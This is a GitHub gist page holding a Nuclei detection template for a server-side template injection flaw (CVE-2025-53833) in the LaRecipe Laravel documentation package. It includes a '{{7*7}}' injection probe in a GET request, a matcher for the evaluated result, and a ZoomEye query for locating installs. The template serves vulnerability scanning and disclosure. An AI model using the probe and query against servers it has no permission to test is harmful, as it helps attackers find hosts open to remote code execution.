-
-
Save emadshanab/26bc030eb463f9e7d6c785b051258098 to your computer and use it in GitHub Desktop.
Nuclei Template for CVE-2025-53833
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2025-53833 | |
| info: | |
| name: LaRecipe is vulnerable to Server-Side Template Injection attacks | |
| author: sushicomabacate | |
| severity: critical | |
| description: | | |
| LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch. | |
| reference: | |
| - https://www.cve.org/CVERecord?id=CVE-2025-53833 | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | |
| cvss-score: 10 | |
| cve-id: CVE-2025-53833 | |
| cwe-id: CWE-1336 | |
| epss-score: | |
| epss-percentile: | |
| cpe: --- | |
| metadata: | |
| verified: true | |
| max-request: 1 | |
| vendor: ---- | |
| product: ---- | |
| shodan-query: ---- | |
| fofa-query: | |
| zoomeye-query: "LaRecipe" | |
| hunter-query: | |
| tags: | |
| http: | |
| - method: GET | |
| path: | |
| - "{{BaseURL}}/docs/1.0?poc={{7*7}}" | |
| matchers-condition: and | |
| matchers: | |
| - type: word | |
| part: body | |
| words: | |
| - "/docs/1.0?poc=49" | |
| condition: and | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment